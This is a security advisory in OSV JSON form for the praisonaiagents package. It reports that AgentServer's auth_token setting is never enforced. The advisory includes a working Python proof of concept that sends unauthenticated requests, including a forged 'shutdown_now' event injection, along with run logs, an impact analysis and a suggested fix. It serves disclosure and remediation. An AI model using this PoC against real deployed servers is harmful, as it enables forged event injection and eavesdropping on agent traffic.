{"id":"PYSEC-2026-3899","summary":"praisonaiagents: AgentServer declares auth_token but never enforces it on any route","details":"**Researcher:** Kai Aizen — SnailSploit (@SnailSploit), Adversarial & Offensive Security Research\n**Target:** https://github.com/MervinPraison/PraisonAI\n\n---\n\n**Package:** `praisonaiagents` on PyPI\n**Affected version (empirically tested):** 1.6.48\n**Component:** `praisonaiagents.server.AgentServer` (the bundled HTTP / SSE server)\n\n---\n\n## TL;DR\n\n`AgentServer.ServerConfig` advertises an `auth_token: Optional[str] = None` field that operators set when they want to lock down the server. The `GET /info` endpoint even displays it back as `\"auth_token\": \"***\"` — strongly implying the value is wired into request authentication.\n\nIt isn't. `AgentServer._create_app` never reads `auth_token`, never adds an authentication middleware, and never decorates any route with a dependency that checks it. Every route — `/info`, `/publish`, `/events`, `/health` — accepts unauthenticated requests regardless of whether `auth_token` is configured.\n\nThe same package contains a *sibling* server, `praisonaiagents.ui.a2a.A2A`, written by the same developer, which implements the bearer-token pattern correctly via FastAPI's `Depends(_verify_auth)`. This rules out the \"auth is not yet implemented; operators are expected to add it\" reading: the developer knew the pattern but did not apply it to `AgentServer`.\n\n## Root cause\n\n```\n   Expected behavior when setting ServerConfig(auth_token=\"…\"):\n     \"Only requests with a matching Authorization header will be\n      accepted on /publish, /events, /info.\"\n\n   Actual behavior (server/server.py, dist 1.6.48):\n     - line 31    auth_token: Optional[str] = None   # declared\n     - line 39    \"auth_token\": \"***\" if self.auth_token else None  # displayed\n     - lines 122-204:  no auth middleware, no Depends, no\n                       request.headers[\"Authorization\"] read,\n                       no comparison to self.config.auth_token.\n\n   Impact:\n     The configuration knob is dead code from the route handlers'\n     perspective.  All routes always run.  The operator has no signal\n     that their auth_token was discarded — /info even confirms it\n     was received by displaying \"***\".\n```\n\n## Sibling proof — the same package gets it right elsewhere\n\n`praisonaiagents/ui/a2a/a2a.py`:\n\n```python\n# line 163\nasync def _verify_auth(authorization: Optional[str] = Header(None)):\n    \"\"\"Verify bearer token if auth_token is configured.\"\"\"\n    if self.auth_token is None:\n        return\n    ...\n    if len(parts) != 2 or parts[0].lower() != \"bearer\" \\\n            or parts[1] != self.auth_token:\n        raise HTTPException(status_code=401, ...)\n\n# line 192\nfrom fastapi import Depends\n_a2a_deps = [Depends(_verify_auth)] if self.auth_token else []\n```\n\nThat is the missing implementation. Porting it to `AgentServer` — either via Starlette `BaseHTTPMiddleware` or by switching to FastAPI and adding `Depends(_verify_auth)` to each route — closes the gap.\n\n## Affected routes (empirically tested)\n\n| Route       | Method | Accepts unauth requests? | Impact                                                                 |\n|-------------|--------|--------------------------|------------------------------------------------------------------------|\n| `/info`     | GET    | **Yes (200)**            | Leaks server config; confirms `auth_token` is set (`\"***\"`); reveals client count and CORS config. |\n| `/publish`  | POST   | **Yes (200)**            | Anyone broadcasts arbitrary `{type, data}` to every subscribed agent.  Event payload is whatever the attacker sends. |\n| `/events`   | GET    | **Yes (200)**            | Anyone subscribes to the SSE stream and observes every event published by the server (and by any other anonymous attacker). |\n| `/health`   | GET    | **Yes (200)**            | Leaks live SSE client count.                                           |\n\n## Impact\n\nThe `/publish` and `/events` routes are the load-bearing ones. Together they let an unauthenticated network-adjacent attacker:\n\n1. **Inject control events** into every agent process subscribed to the server. `AgentServer.broadcast(event_type, data)` puts the payload into every `SSEClient.queue`; any consumer dispatching on `event_type` will dispatch on the attacker-chosen type. Real deployments register handlers per event type via `AgentServer.on_event(...)`; an attacker who can guess (or enumerate via `/info` + inspection) a registered type can drive arbitrary handler invocations with attacker-chosen `data`.\n2. **Eavesdrop on the entire event bus** by subscribing to `/events`. Whatever the legitimate publishers send is visible: agent observations, intermediate plans, tool inputs and outputs, user-supplied prompts that the operator believed were behind the `auth_token` wall.\n3. **Pivot via leaked config.** `/info` is sufficient to enumerate `cors_origins` (helping plan cross-origin attacks if any of the listed origins are attacker-controlled) and to confirm that the target has bothered to set `auth_token`, signalling a high-value target.\n\n`SSEClient.queue` is a `queue.Queue` with no documented size cap; the event broadcaster does not check `max_connections` against publishers, only subscribers. An attacker can also flood `/publish` to fill every subscriber's queue, denying service to legitimate broadcasts (CWE-770). Not scored as the main impact above.\n\n## Anchors\n\npraisonaiagents 1.6.48, file `praisonaiagents/server/server.py`:\n\n| Line  | Symbol                                                  | What it shows |\n|-------|---------------------------------------------------------|---------------|\n| 31    | `auth_token: Optional[str] = None`                       | Declared. |\n| 39    | `\"auth_token\": \"***\" if self.auth_token else None`       | Displayed (masked) in `/info`. |\n| 121   | `def _create_app(self):`                                 | Route + middleware setup begins. |\n| 132   | `async def health(request):`                             | No auth check. |\n| 139   | `async def events(request):`                             | No auth check. |\n| 164   | `async def publish(request):`                            | No auth check. |\n| 182   | `async def info(request):`                               | No auth check. |\n| 190   | `routes = [Route(\"/health\", …), Route(\"/events\", …), Route(\"/publish\", …), Route(\"/info\", …)]` | Routes registered without `Depends`/middleware. |\n| 197   | `app = Starlette(routes=routes)`                         | App created. |\n| 200   | `app = CORSMiddleware(app, …)`                           | **Only** middleware added. |\n\nSource sha256 (1.6.48, `praisonaiagents/server/server.py`): `aac9497d515b5cb928070267b860b11ef38b537605e64659feef895b524ca7e4` (9,962 bytes).\n\nSibling (same package, same field name, *enforced*): `praisonaiagents/ui/a2a/a2a.py:163-193`.\n\n## Reproduction (empirical PoC)\n\n`poc/poc.py` starts `AgentServer` with `ServerConfig(auth_token=\"supersecret-not-actually-checked\")` and then sends unauthenticated requests to each route.\n\nRun log (`poc/run-log.txt`):\n\n```\n[1] GET /info     (no Authorization) -\u003e HTTP 200\n    body: {\"name\":\"PraisonAI Agent Server\",\"version\":\"1.0.0\",\"clients\":0,\n           \"config\":{\"host\":\"127.0.0.1\",\"port\":18765,\"cors_origins\":[],\n                     \"auth_token\":\"***\",\"max_connections\":100}}\n[2] POST /publish (no Authorization) -\u003e HTTP 200\n    body: {\"success\":true,\"clients\":0}\n[3] GET /health   (no Authorization) -\u003e HTTP 200\n[4] GET /events   (no Authorization) -\u003e HTTP 200\n\nVULNERABLE: 4 unauthenticated routes\nVERDICT: VULNERABLE\nEXIT 0\n```\n\n## Suggested fix\n\nMake `AgentServer` reuse the A2A pattern. Smallest fix:\n\n```python\n# in _create_app, after `app = Starlette(routes=routes)`:\nif self.config.auth_token:\n    from starlette.middleware.base import BaseHTTPMiddleware\n    from starlette.responses import JSONResponse\n\n    expected = \"Bearer \" + self.config.auth_token\n\n    class _Auth(BaseHTTPMiddleware):\n        async def dispatch(self, request, call_next):\n            if request.url.path == \"/health\":     # if /health should remain public\n                return await call_next(request)\n            got = request.headers.get(\"authorization\", \"\")\n            if not hmac.compare_digest(got, expected):\n                return JSONResponse({\"error\": \"unauthorized\"}, status_code=401)\n            return await call_next(request)\n\n    app = _Auth(app)\n\napp = CORSMiddleware(app, ...)\n```\n\nConstant-time comparison (`hmac.compare_digest`) is appropriate since this is a network-comparable secret.\n\n## Steps to reproduce\n\n1. Clone the target: `git clone --depth 1 https://github.com/MervinPraison/PraisonAI`\n2. Run the proof of concept (`poc.py`) against the cloned source.\n3. Observe the result shown under *Verified result* below.\n\n## Proof of concept\n\n`poc.py`\n\n```python\n\"\"\"\nPoC: praisonaiagents AgentServer ignores ServerConfig.auth_token.\n\nThe ServerConfig dataclass declares `auth_token: Optional[str] = None` and\nthe /info endpoint reports it as \"***\" when set, giving operators the\nimpression that requests will be authenticated.  In reality,\nAgentServer._create_app never reads auth_token, never adds an auth\nmiddleware, and never decorates any route with Depends(_verify_auth).\n\nThis PoC starts AgentServer with auth_token=\"supersecret\", then hits\nevery route without any Authorization header.  All requests succeed.\n\"\"\"\n\nimport json\nimport sys\nimport time\nimport threading\nfrom urllib.request import Request, urlopen\nfrom urllib.error import HTTPError, URLError\n\nfrom praisonaiagents.server import AgentServer, ServerConfig\n\nPORT = 18765\nAUTH_TOKEN = \"supersecret-not-actually-checked\"\n\ndef http_request(method, path, body=None, headers=None):\n    url = f\"http://127.0.0.1:{PORT}{path}\"\n    data = None\n    if body is not None:\n        data = json.dumps(body).encode(\"utf-8\")\n    req = Request(url, data=data, method=method, headers=headers or {})\n    if data is not None:\n        req.add_header(\"Content-Type\", \"application/json\")\n    try:\n        with urlopen(req, timeout=5) as resp:\n            return resp.status, resp.read().decode(\"utf-8\", errors=\"replace\")\n    except HTTPError as e:\n        return e.code, e.read().decode(\"utf-8\", errors=\"replace\")\n    except URLError as e:\n        return None, f\"URLError: {e}\"\n\ndef main() -\u003e int:\n    print(\"=\" * 70)\n    print(f\"praisonaiagents version: 1.6.48\")\n    print(f\"Test: start AgentServer with auth_token={AUTH_TOKEN!r}\")\n    print(f\"      then send UNAUTHENTICATED requests to every route.\")\n    print(\"=\" * 70)\n\n    config = ServerConfig(host=\"127.0.0.1\", port=PORT, auth_token=AUTH_TOKEN, cors_origins=[])\n    server = AgentServer(config=config)\n    server.start(blocking=False)\n    time.sleep(1.0)  # wait for uvicorn to be ready\n\n    findings = []\n\n    code, body = http_request(\"GET\", \"/info\")\n    info_data = None\n    try:\n        info_data = json.loads(body)\n    except Exception:\n        pass\n    print(f\"\\n[1] GET /info (no Authorization header) -\u003e HTTP {code}\")\n    print(f\"    body: {body[:200]}\")\n    if code == 200 and info_data and info_data.get(\"config\", {}).get(\"auth_token\") == \"***\":\n        findings.append(\"/info: unauthenticated; leaks that auth_token IS configured\")\n\n    payload = {\"type\": \"attacker_injected_event\",\n               \"data\": {\"forged_from\": \"unauthenticated_client\", \"instruction\": \"shutdown_now\"}}\n    code, body = http_request(\"POST\", \"/publish\", body=payload)\n    print(f\"\\n[2] POST /publish (no Authorization header) -\u003e HTTP {code}\")\n    print(f\"    body: {body[:200]}\")\n    if code == 200:\n        try:\n            ok = json.loads(body).get(\"success\") is True\n        except Exception:\n            ok = False\n        if ok:\n            findings.append(\"/publish: unauthenticated event broadcast to all SSE clients\")\n\n    code, body = http_request(\"GET\", \"/health\")\n    print(f\"\\n[3] GET /health (no Authorization header) -\u003e HTTP {code} body={body[:120]}\")\n    if code == 200:\n        findings.append(\"/health: unauthenticated; leaks live client count\")\n\n    sse_status = []\n    def sse_reader():\n        try:\n            req = Request(f\"http://127.0.0.1:{PORT}/events\", method=\"GET\")\n            with urlopen(req, timeout=3) as resp:\n                sse_status.append(f\"HTTP {resp.status}\")\n                try:\n                    chunk = resp.read(64)\n                    sse_status.append(f\"first-chunk-bytes={len(chunk)}\")\n                except Exception as e:\n                    sse_status.append(f\"chunk-read: {e}\")\n        except Exception as exc:\n            sse_status.append(f\"ERR: {exc}\")\n    t = threading.Thread(target=sse_reader, daemon=True)\n    t.start()\n    time.sleep(2.0)\n    print(f\"\\n[4] GET /events (no Authorization header) -\u003e {sse_status}\")\n    if sse_status and sse_status[0] == \"HTTP 200\":\n        findings.append(\"/events: unauthenticated SSE subscription accepted\")\n\n    print(\"\\n\" + \"=\" * 70)\n    if findings:\n        print(f\"VULNERABLE: {len(findings)} unauthenticated routes\")\n        for f in findings:\n            print(f\"  - {f}\")\n        print(\"VERDICT: VULNERABLE\")\n        return 0\n    print(\"DEFENDED\")\n    return 1\n\nif __name__ == \"__main__\":\n    sys.exit(main())\n```\n\n## Verification harness (executed against the cloned repo)\n\nThis drives the unmodified upstream code rather than a reproduction.\n\n```python\nimport sys, types, os, importlib.util\nBK=os.path.abspath(\"repos/PraisonAI/src/praisonai-agents\"); sys.path.insert(0,BK)\nfor p in [\"praisonaiagents\",\"praisonaiagents.server\"]:\n    m=types.ModuleType(p); m.__path__=[BK+\"/\"+p.replace(\".\",\"/\")]; sys.modules[p]=m\nlg=types.ModuleType(\"praisonaiagents._logging\"); lg.get_logger=lambda *a,**k: __import__(\"logging\").getLogger(\"x\"); sys.modules[\"praisonaiagents._logging\"]=lg\nspec=importlib.util.spec_from_file_location(\"praisonaiagents.server.server\", BK+\"/praisonaiagents/server/server.py\")\nsrvmod=importlib.util.module_from_spec(spec); srvmod.__package__=\"praisonaiagents.server\"; sys.modules[spec.name]=srvmod; spec.loader.exec_module(srvmod)\n\nfrom starlette.testclient import TestClient\n# Operator DOES configure an auth_token, expecting it to protect the server:\ncfg = srvmod.ServerConfig(host=\"127.0.0.1\", port=8765, auth_token=\"super-secret-operator-token\")\nsrv = srvmod.AgentServer(config=cfg)            # REAL AgentServer\napp = srv._create_app()                        # REAL Starlette app + routes\nclient = TestClient(app)\n\nprint(\"[*] auth_token configured on server:\", repr(cfg.auth_token))\nr_info = client.get(\"/info\")\nprint(f\"[+] GET /info  (no auth) -\u003e HTTP {r_info.status_code}; config disclosed: {r_info.json().get('config')}\")\nr_pub = client.post(\"/publish\", json={\"type\":\"admin_event\",\"data\":{\"x\":\"injected-by-attacker\"}})\nprint(f\"[+] POST /publish (no auth) -\u003e HTTP {r_pub.status_code}; body: {r_pub.json()}\")\n\nassert r_info.status_code==200 and r_pub.status_code==200 and r_pub.json().get(\"success\") is True\nprint(\"[+] CONFIRMED against real praisonaiagents repo: auth_token configured but NOT enforced — /info + /publish reachable unauthenticated\")\n```\n\n## Verified result\n\nThis PoC was executed against the live upstream code; captured output:\n\n```\n[*] auth_token configured on server: 'super-secret-operator-token'\n[+] GET /info  (no auth) -\u003e HTTP 200; config disclosed: {'host': '127.0.0.1', 'port': 8765, 'cors_origins': [], 'auth_token': '***', 'max_connections': 100}\n[+] POST /publish (no auth) -\u003e HTTP 200; body: {'success': True, 'clients': 0}\n[+] CONFIRMED against real praisonaiagents repo: auth_token configured but NOT enforced — /info + /publish reachable unauthenticated\n```\n\n## Credit\n\nKai Aizen — SnailSploit (@SnailSploit). Adversarial & Offensive Security Research.","aliases":["CVE-2026-55528","GHSA-7g3p-92qq-8wvh"],"modified":"2026-09-10T12:15:10.980541071Z","published":"2026-09-10T09:44:54.034901Z","references":[{"type":"WEB","url":"https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-7g3p-92qq-8wvh"},{"type":"WEB","url":"https://github.com/MervinPraison/PraisonAI/commit/2f9677abb2ea68eab864ee8b6a828fd0141612e1"},{"type":"PACKAGE","url":"https://github.com/MervinPraison/PraisonAI"},{"type":"WEB","url":"https://github.com/MervinPraison/PraisonAI/releases/tag/v4.6.58"},{"type":"PACKAGE","url":"https://pypi.org/project/praisonaiagents"},{"type":"ADVISORY","url":"https://github.com/advisories/GHSA-7g3p-92qq-8wvh"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2026-55528"}],"affected":[{"package":{"name":"praisonaiagents","ecosystem":"PyPI","purl":"pkg:pypi/praisonaiagents"},"ranges":[{"type":"ECOSYSTEM","events":[{"introduced":"0"},{"fixed":"1.6.58"}]}],"versions":["0.0.1","0.0.10","0.0.100","0.0.101","0.0.102","0.0.103","0.0.104","0.0.105","0.0.106","0.0.107","0.0.108","0.0.109","0.0.11","0.0.110","0.0.111","0.0.112","0.0.113","0.0.114","0.0.115","0.0.116","0.0.117","0.0.118","0.0.119","0.0.12","0.0.120","0.0.121","0.0.122","0.0.123","0.0.124","0.0.125","0.0.126","0.0.127","0.0.128","0.0.129","0.0.13","0.0.130","0.0.131","0.0.132","0.0.133","0.0.134","0.0.135","0.0.136","0.0.137","0.0.138","0.0.139","0.0.14","0.0.140","0.0.141","0.0.142","0.0.143","0.0.144","0.0.145","0.0.146","0.0.147","0.0.148","0.0.149","0.0.15","0.0.150","0.0.151","0.0.152","0.0.153","0.0.154","0.0.155","0.0.156","0.0.157","0.0.158","0.0.159","0.0.16","0.0.160","0.0.161","0.0.162","0.0.163","0.0.164","0.0.165","0.0.166","0.0.167","0.0.168","0.0.169","0.0.17","0.0.170","0.0.171","0.0.172","0.0.173","0.0.174","0.0.175","0.0.176","0.0.177","0.0.178","0.0.179","0.0.18","0.0.180","0.0.181","0.0.182","0.0.183","0.0.184","0.0.185","0.0.187","0.0.188","0.0.189","0.0.19","0.0.190","0.0.191","0.0.192","0.0.193","0.0.194","0.0.195","0.0.196","0.0.197","0.0.198","0.0.199","0.0.2","0.0.20","0.0.21","0.0.22","0.0.23","0.0.24","0.0.25","0.0.26","0.0.27","0.0.28","0.0.29","0.0.3","0.0.30","0.0.31","0.0.32","0.0.33","0.0.34","0.0.35","0.0.36","0.0.37","0.0.38","0.0.39","0.0.4","0.0.40","0.0.41","0.0.42","0.0.43","0.0.44","0.0.45","0.0.46","0.0.47","0.0.48","0.0.49","0.0.5","0.0.50","0.0.51","0.0.52","0.0.53","0.0.54","0.0.56","0.0.57","0.0.58","0.0.59","0.0.6","0.0.60","0.0.61","0.0.62","0.0.63","0.0.64","0.0.65","0.0.66","0.0.67","0.0.68","0.0.69","0.0.7","0.0.70","0.0.71","0.0.72","0.0.73","0.0.74","0.0.75","0.0.76","0.0.77","0.0.78","0.0.79","0.0.8","0.0.80","0.0.81","0.0.82","0.0.83","0.0.84","0.0.85","0.0.86","0.0.87","0.0.88","0.0.89","0.0.9","0.0.90","0.0.91","0.0.92","0.0.93","0.0.94","0.0.95","0.0.96","0.0.97","0.0.98","0.0.99","0.1.0","0.1.1","0.1.10","0.1.11","0.1.12","0.1.13","0.1.14","0.1.15","0.1.16","0.1.17","0.1.18","0.1.19","0.1.2","0.1.20","0.1.21","0.1.22","0.1.23","0.1.24","0.1.25","0.1.26","0.1.27","0.1.3","0.1.4","0.1.5","0.1.6","0.1.7","0.1.8","0.1.9","0.10.0","0.10.1","0.10.10","0.10.2","0.10.3","0.10.4","0.10.5","0.10.6","0.10.7","0.10.8","0.10.9","0.11.0","0.11.1","0.11.10","0.11.11","0.11.12","0.11.13","0.11.14","0.11.15","0.11.16","0.11.17","0.11.18","0.11.19","0.11.2","0.11.20","0.11.21","0.11.22","0.11.23","0.11.24","0.11.25","0.11.27","0.11.28","0.11.29","0.11.3","0.11.30","0.11.31","0.11.4","0.11.5","0.11.6","0.11.7","0.11.8","0.11.9","0.12.0","0.12.1","0.12.10","0.12.11","0.12.12","0.12.13","0.12.14","0.12.15","0.12.16","0.12.17","0.12.18","0.12.19","0.12.2","0.12.20","0.12.21","0.12.3","0.12.4","0.12.5","0.12.6","0.12.7","0.12.8","0.12.9","0.13.0","0.13.1","0.13.10","0.13.11","0.13.12","0.13.13","0.13.14","0.13.15","0.13.16","0.13.17","0.13.18","0.13.19","0.13.2","0.13.20","0.13.21","0.13.22","0.13.23","0.13.3","0.13.4","0.13.5","0.13.6","0.13.7","0.13.8","0.13.9","0.14.0","0.14.1","0.14.10","0.14.11","0.14.12","0.14.14","0.14.15","0.14.16","0.14.2","0.14.3","0.14.4","0.14.5","0.14.6","0.14.7","0.14.8","0.14.9","0.15.0","0.15.1","0.15.2","0.15.3","0.2.0","0.2.1","0.2.2","0.3.0","0.3.1","0.3.2","0.3.3","0.3.4","0.4.0","0.4.1","0.5.0","0.5.1","0.5.2","0.5.3","0.6.0","0.6.1","0.6.2","0.6.3","0.6.4","0.6.5","0.6.6","0.6.7","0.6.8","0.7.0","0.7.1","0.8.0","0.8.1","0.9.0","0.9.1","1.0.0","1.1.0","1.2.0","1.2.1","1.2.2","1.2.3","1.2.4","1.3.0","1.3.1","1.4.0","1.4.1","1.4.2","1.4.3","1.4.4","1.4.5","1.4.6","1.4.7","1.4.8","1.5.0","1.5.1","1.5.10","1.5.100","1.5.101","1.5.102","1.5.103","1.5.104","1.5.105","1.5.106","1.5.107","1.5.108","1.5.109","1.5.11","1.5.110","1.5.111","1.5.112","1.5.113","1.5.114","1.5.115","1.5.116","1.5.117","1.5.118","1.5.119","1.5.12","1.5.120","1.5.121","1.5.122","1.5.123","1.5.124","1.5.125","1.5.126","1.5.127","1.5.128","1.5.129","1.5.13","1.5.130","1.5.131","1.5.132","1.5.133","1.5.134","1.5.135","1.5.136","1.5.137","1.5.138","1.5.139","1.5.14","1.5.140","1.5.141","1.5.142","1.5.143","1.5.144","1.5.145","1.5.146","1.5.147","1.5.148","1.5.149","1.5.15","1.5.16","1.5.17","1.5.18","1.5.19","1.5.2","1.5.20","1.5.21","1.5.22","1.5.23","1.5.24","1.5.25","1.5.26","1.5.27","1.5.28","1.5.29","1.5.3","1.5.30","1.5.31","1.5.32","1.5.33","1.5.34","1.5.35","1.5.36","1.5.37","1.5.38","1.5.39","1.5.40","1.5.41","1.5.42","1.5.43","1.5.44","1.5.45","1.5.46","1.5.47","1.5.48","1.5.49","1.5.5","1.5.50","1.5.51","1.5.52","1.5.53","1.5.54","1.5.55","1.5.56","1.5.57","1.5.58","1.5.59","1.5.6","1.5.60","1.5.61","1.5.62","1.5.63","1.5.64","1.5.65","1.5.66","1.5.67","1.5.68","1.5.69","1.5.7","1.5.70","1.5.71","1.5.72","1.5.73","1.5.74","1.5.75","1.5.76","1.5.77","1.5.78","1.5.79","1.5.8","1.5.80","1.5.81","1.5.82","1.5.83","1.5.84","1.5.85","1.5.86","1.5.87","1.5.88","1.5.89","1.5.9","1.5.90","1.5.91","1.5.92","1.5.93","1.5.94","1.5.95","1.5.96","1.5.97","1.5.98","1.5.99","1.6.1","1.6.10","1.6.11","1.6.12","1.6.13","1.6.14","1.6.15","1.6.16","1.6.17","1.6.18","1.6.19","1.6.2","1.6.20","1.6.21","1.6.22","1.6.23","1.6.24","1.6.25","1.6.26","1.6.27","1.6.28","1.6.29","1.6.3","1.6.30","1.6.31","1.6.32","1.6.33","1.6.34","1.6.35","1.6.36","1.6.37","1.6.38","1.6.39","1.6.4","1.6.40","1.6.41","1.6.42","1.6.43","1.6.44","1.6.45","1.6.46","1.6.47","1.6.48","1.6.5","1.6.50","1.6.51","1.6.52","1.6.53","1.6.54","1.6.55","1.6.56","1.6.57","1.6.6","1.6.7","1.6.8","1.6.9"],"database_specific":{"source":"https://github.com/pypa/advisory-database/blob/main/vulns/praisonaiagents/PYSEC-2026-3899.yaml"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N"}]}